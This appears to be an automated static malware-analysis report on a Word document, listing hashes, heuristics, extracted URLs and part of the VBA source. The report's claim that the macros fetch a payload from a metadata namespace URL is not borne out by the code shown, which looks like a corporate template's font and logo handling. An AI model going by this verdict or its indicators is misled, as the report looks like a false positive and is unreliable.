Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9976417cc49d90f1…

MALICIOUS

Office (OOXML)

3.69 MB Created: 2021-09-07 11:33:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-09-27
MD5: 9b79a35c23724363164a499cdb43cb55 SHA-1: ee3a7d28ebd1c705555ea8bbb45e56f29a75b17d SHA-256: 9976417cc49d90f15c00c06b6b9254b6388c73b35b8ab52e085ad1e0472c79f1
536 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols T1105 Ingress Tool Transfer

The sample contains VBA macros that are automatically executed upon opening the document, indicated by the 'Document_Open' macro and 'OLE_VBA_AUTOOPEN' heuristic. These macros utilize 'WScript.Shell' and 'URLDownloadToFile' to download and execute a payload from the URL 'http://www.npes.org/pdfx/ns/id/'. The VBA project part was also renamed to evade detection, suggesting malicious intent.

Heuristics 17

  • VBA project inside OOXML medium 11 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: word/vbaProjectSignatureV3.bin)
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Payload URL recovered from embedded OLE object (1 URL) info OOXML_EMBEDDED_OBJECT_URL
    An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream — stored literally (incl. UTF-16) or base64-encoded — which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
  • VBA project carries a recognised code-signing signature info VBA_SIGNED_TRUSTED
    The VBA project is Authenticode-signed and the signer/issuer chain matches a recognised code-signing publisher or CA. Informational only — the signature is NOT yet verified to cover the current project bytes, so it does not (yet) reduce the verdict.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://key-design-share.com/FHG_Erscheinungsbild/01_Grundelemente/1_1_Logos/ Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • http://www.npes.org/pdfx/ns/id/Referenced by macro
    • https://info-archiv.fraunhofer.de/cd-2009/Fraunhofer_Erscheinungsbild/01_Grundelemente/1_1_Logos/Referenced by macro
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
    • http://ns.adobe.com/xap/1.0/Referenced by macro
    • http://ns.adobe.com/xap/1.0/mm/Referenced by macro
    • http://purl.org/dc/elements/1.1/Referenced by macro
    • http://ns.adobe.com/pdf/1.3/Referenced by macro
    • http://ns.adobe.com/pdfx/1.3/Referenced by macro
    • http://ocsp.globalsign.com/rootr30Referenced by macro
    • http://secure.globalsign.com/cacert/root-r3.crt06Referenced by macro
    • http://crl.globalsign.com/root-r3.crl0GReferenced by macro
    • https://www.globalsign.com/repository/0Referenced by macro
    • http://ocsp.globalsign.com/codesigningrootr450FReferenced by macro
    • http://secure.globalsign.com/cacert/codesigningrootr45.crt0AReferenced by macro
    • http://crl.globalsign.com/codesigningrootr45.crl0VReferenced by macro
    • http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=Referenced by macro
    • http://ocsp.globalsign.com/gsgccr45codesignca20200VReferenced by macro
    • http://crl.globalsign.com/gsgccr45codesignca2020.crl0Referenced by macro

Extracted artifacts 8

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 41994 bytes
SHA-256: 964ba449822fafec52d983098ea24872eea577f452d45e9bd6e83033dcec70af
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim WithEvents appWord As Application
Attribute appWord.VB_VarHelpID = -1

Sub Document_New()
    Set appWord = Application
    
    '## schrift überprüfen
    Dim strFontName As String

    strFontName = "Frutiger LT Com 45 Light"
        If IsFontInstalled(strFontName) Then
            
        Else
            MsgBox strFontName & " ist  n i c h t  installiert! Das Dokument wird geschlossen. Bitte Schrift installieren!"
            
            Documents.Close
            Exit Sub
        End If

    Dim strFontName2 As String

    strFontName2 = "Frutiger LT Com 55 Roman"
        If IsFontInstalled(strFontName2) Then
            
        Else
            MsgBox strFontName2 & " ist  n i c h t  installiert! Das Dokument wird geschlossen. Bitte Schrift installieren!"
            
            Documents.Close
            Exit Sub
        End If
End Sub

Sub document_open()
    Set appWord = Application
End Sub

Private Sub appWord_DocumentBeforeSave(ByVal Doc As Document, SaveAsUI As Boolean, Cancel As Boolean)
    If (SaveAsUI) Then
        Cancel = True
        
        Set fd = Dialogs(wdDialogFileSaveAs)
        With fd
            .Format = wdFormatXMLDocument
            If .Show Then
                If (.Format = wdFormatXMLDocument) Then
                    ActiveDocument.SaveAs2 FileName:=.Name, _
                        FileFormat:=wdFormatXMLDocument, _
                        AddToRecentFiles:=True, _
                        SaveFormsData:=False, _
                        SaveAsAOCELetter:=False, _
                        CompatibilityMode:=14
                ElseIf (.Format = wdFormatXMLDocumentMacroEnabled) Then
                    ActiveDocument.SaveAs2 FileName:=.Name, _
                        FileFormat:=wdFormatXMLDocumentMacroEnabled, _
                        AddToRecentFiles:=True, _
                        SaveFormsData:=False, _
                        SaveAsAOCELetter:=False, _
                        CompatibilityMode:=14
                Else
                    ActiveDocument.SaveAs2 FileName:=.Name, FileFormat:=.Format
                End If
            End If
        End With
        Set fd = Nothing
        
        'Application.OnTime Now, "DocumentAfterSave"
    End If
End Sub

Sub DocumentAfterSave()
End Sub

Attribute VB_Name = "Logotausch"
Public checkLNG As Boolean

Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
  "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal _
    szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
    
Function Stream_BinaryToString(Binary, CharSet)
  Const adTypeText = 2
  Const adTypeBinary = 1
  
  'Create Stream object
  Dim BinaryStream 'As New Stream
  Set BinaryStream = CreateObject("ADODB.Stream")
  
  'Specify stream type - we want To save text/string data.
  BinaryStream.Type = adTypeBinary
  
  'Open the stream And write text/string data To the object
  BinaryStream.Open
  BinaryStream.Write Binary
  
  
  'Change stream type To binary
  BinaryStream.Position = 0
  BinaryStream.Type = adTypeText
  
  'Specify charset For the source text (unicode) data.
  If Len(CharSet) > 0 Then
    BinaryStream.CharSet = CharSet
  Else
    BinaryStream.CharSet = "us-ascii"
  End If
  
  'Open the stream And get binary data from the object
  Stream_BinaryToString = BinaryStream.ReadText
End Function

Function Logo_einstellen(pfad, eps)
'    Selection.SetRange 0, 0
    ActiveDocument.ActiveWindow.View.SeekView = wdSeekCurrentPageHeader
        For Each sect In ActiveDocument.Sections
            For Each head In sect.Headers
                For Each shp In head.Shapes
'               
... (truncated)
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject1.bin 2810880 bytes
SHA-256: 2d352e6a783f45f64b769301cfcc38adbf232711e1c9994f7d5a0ca52ae3855a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.80, consistent with packed or encrypted content.
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 181248 bytes
SHA-256: bf529a607f5676ac3860192aea26cd6086efe12b2ac6e5b5cd76b6cc0ed34ede
vbaProject_01.bin vba-project OOXML VBA project: word/vbaProjectSignatureV3.bin 8993 bytes
SHA-256: 41cf69568800122180cb12b6d637f99609e7c211e17a1e716e2f6ec708785fc8
vbaProject_02.bin vba-project OOXML VBA project: word/vbaProjectSignatureAgile.bin 8993 bytes
SHA-256: 5415ae5dd66b9102555da8e8b491b49bbee3424affd4de4746b2b4764e2745b7
vbaProject_03.bin vba-project OOXML VBA project: word/vbaProjectSignature.bin 8878 bytes
SHA-256: 421cf429da9c682b3643aa1e9333066bf3971b8e6bf03bfacff63cc64563c964
emf_00.emf ooxml-emf OOXML EMF part: word/media/image2.emf 18516 bytes
SHA-256: 1c2deedc3575abff3f48432c0522c1a2d470b5085559e5b5a18ac3db12cfd69f
emf_01.emf ooxml-emf OOXML EMF part: word/media/image1.emf 4784 bytes
SHA-256: a2a44070544c416819d2d65b99f9fb3891c55371f4c4f3ffce26e6ecb7d739d0